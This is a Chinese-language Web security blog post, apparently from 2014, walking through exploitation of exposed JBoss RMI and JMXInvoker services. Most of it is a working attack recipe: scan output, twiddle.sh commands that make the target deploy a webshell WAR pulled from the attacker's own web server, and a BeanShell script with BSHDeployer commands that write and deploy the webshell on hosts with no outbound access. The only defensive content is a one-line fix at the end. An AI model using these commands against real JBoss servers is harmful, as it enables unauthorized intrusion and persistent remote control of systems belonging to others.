首页 > Web安全 > JBoss远程方法调用漏洞利用详解
2014
01-17

JBoss远程方法调用漏洞利用详解

早上起床打开微博看到空虚浪子心大神发的一篇有关Jboss漏洞的文章,对我等菜鸟来说那边文章看起来还是很吃力的,所以查了查国内外的资料,翻译写了这边文章,记录一下。

在JBoss服务器上部署web应用程序,有很多不同的方式,诸如:JMX Console、Remote Method Invocation(RMI)、JMXInvokerServlet、HttpAdapter等。

本文主要是关于RMI远程方法调用漏洞的,其它几种部署方式比如JMX Console,也是会有漏洞的,主要看JBoss服务器的配置是否正确严谨。之前也有一篇关于JMX Console漏洞利用的。有兴趣可以在本站搜索一下,言归正传:

Metasploit有很多的模块针对不同的JBOSS漏洞,其中有 jboss_vulnscan模块,路径为:auxiliary/scanner/http/jboss_vulnscan, 通过该模块可以进行JBoss服务器漏洞扫描,可以探测是否有开放4444,1098,1099端口。当然也可以使用Nmap批量扫描某个网段是否有开放1099,1098或4444端口。如下:

[+] 192.168.0.35:443 /invoker/JMXInvokerServlet does not require authentication (200)

[*] 192.168.0.35:443 Checking services...

[*] 192.168.0.35:443 Naming Service tcp/1098: open

[*] 192.168.0.35:443 Naming Service tcp/1099: open

[*] 192.168.0.35:443 RMI invoker tcp/4444: open

可以看到RMI默认端口4444是开启的,JNDI(Java Naming and Directory Interface)默认端口也是1098,1099也是开启的。有关JNDI的解释可以百度。

为了和远程目标JBoss服务器进行交互,需要在本地安装Jboss AS(如:JBoss – 4.2.3.GA ),使用其中bin目录下的twiddle和Jboss进行交互,在linux下使用用twiddle.sh,在windows下使用twiddle.bat,如下:

$ sh jboss-4.2.3.GA/bin/twiddle.sh -h
A JMX client to ’twiddle’ with a remote JBoss server.
usage: twiddle.sh [options] <command> [command_arguments]
options:
 -h, --help                   Show this help message
 --help-commands          Show a list of commands
-H=<command>                 Show command specific help
-c=command.properties            Specify the command.properties file to use
-D<name>[=<value>]               Set a system property
--                               Stop procession options
-s, --server=<url>               The JNDI URL of the remote server
-a, --adapter=<name>             The JNDI name of the RMI adapter to user
-u, --user=<name>                Specify the username for authentication
-p, --password=<name>            Specify the password for authentication
-q, --quiet                      Be somewhat more quiet

获取远程目标JBoss服务器的系统信息,用如下命令:

root@bt:/pentest/web/jboss/jboss-4.2.1.GA/bin# ./twiddle.sh -s 192.168.0.35 get "jboss.system:type=ServerInfo"
HostAddress=192.168.0.35
......
JavaVersion=1.5.0_13
MaxMemory=266600448

为了获取更高的权限,可以给JBoss服务器部署我们的webshell,创建一个war文件,可以使用Myeclipse来构建一个包含webshell的war,方法如下:

1、打开Myeclipse新建Web项目
2、把jsp放到WebRoot目录下
3、导出项目为war文件

JBoss远程方法调用漏洞利用详解 - 第1张  | 阿德马Web安全

构建好包含webshell的war之后,可以使用twiddle将该war部署的目标jboss服务器上,首先需要将war放到一个web服务器,可以使用twistd快速搭建一个web,如下:

root@bt:/pentest/web/jboss/fns# ls

getshell.war

root@bt:/pentest/web/jboss/fns# twistd -n --path=. --port=80

部署war到Jboss服务器,命令如下:

root@bt:/pentest/web/jboss/jboss-4.2.1.GA/bin# ./twiddle.sh -s 192.168.0.35 invoke "jboss.system:service=MainDeployer" deploy http://10.0.1.50/getshell.war

执行之后就会在jboss服务器上部署好我们的webshell,路径为:

http://192.168.0.35/getshell/customize.jsp
以上是一个使用RMI远程方法调用漏洞入侵Jboss服务器的过程,以上的过程也是有前提条件的,最主要的是Jboss服务器需要允许访问远程的HTTP服务器,否则利用RMI是没有办法进行部署远程war到JBOSS服务器。

然而在很多配置中,防火墙不允许JBoss服务器对外发出连接请求,如果遇到有防火墙的这种情况,可以使用BSHDeployer在目标Jboss服务器上执行任意的Beanshell来部署webshell。

BeanShell是一种运行在JRE上的脚本语言,该语言支持常规的Java语法。可以很快写完,并且不需要编译,JBoss服务器中BSHDeployer可以部署BeanShell脚本,它会安装后自动执行。具体的步骤如下:

1,按照前文提到的方法,创建好包含jspshell的shell.war;
2,用linux下的base64命令生成shell.war的base64的表示,命令如下:

root@bt:~#base64 -w 0 shell.war>>shell.war.base64

3,创建beanshell脚本,创建一个txt文档,无需任何换行符,保存以下内容到该txt:

import java.io.FileOutputStream; import sun.misc.BASE64Decoder; String val="shell.war的base64表示"; BASE64Decoder decoder = new BASE64Decoder(); byte[] byteval=decoder.decodeBuffer(val); FileOutputStream fs = new FileOutputStream("/temp/shell.war"); fs,write(byteval); fs.close();

其中val变量中是shell.war文件的base64表示,如果目标Jboss服务器是windows的话目录修改如:C:\WINDOWS\TEMP\shell.war,将txt重命名为:.bsh文件

4,使用前文中的bin/twiddle.sh工具将本地.bsh文件创建到远程jboss服务器上,命令如下:

$ ./jboss-4.2.3.GA/bin/twiddle.sh -s 192.168.0.35 invoke jboss.deployer:service=BSHDeployer createScriptDeployment "‘cat deployer.bsh‘" deployer.bsh

该命令执行完成之后会在远程Jboss服务器生成shell.war,目录为/temp/shell.war

5,然后继续使用twiddle.sh将Jboss服务器上的shell.war进行部署,命令如下:

$ ./jboss-4.2.3.GA/bin/twiddle.sh -s 192.168.0.35 invoke jboss.system:service=MainDeployer deploy "/temp/shell.war"

目标Jboss服务器为windows的话命令如下:

$./jboss-4.2.3.GA/bin/twiddle.sh -s 192.168.0.35 invoke jboss.system:service=MainDeployer deploy "file:C:/WINDOWS/TEMP/shell.war"

这样就会就会将shell.war部署在目标jboss服务器上,其中有我们的jspshell,接下来你们懂的!

Jboss远程方法调用漏洞修复建议引用空虚浪子心大婶的文章内容:

把invoker删除了,再把1099关闭就好。

PS:本文由阿德马童鞋翻译查找总结,转载请注明出处,TKS!有部分不准确的地方也欢迎拍砖。

最后编辑:
作者:admin
这个作者貌似有点懒,什么都没有留下。

JBoss远程方法调用漏洞利用详解》有 1 条评论

  1. 婆娑 说:

    遇到了一个jboss-5.1.0.GA,可以上传war,default/tmp目录没有权限,大神可有妙招不?

留下一个回复

你的email不会被公开。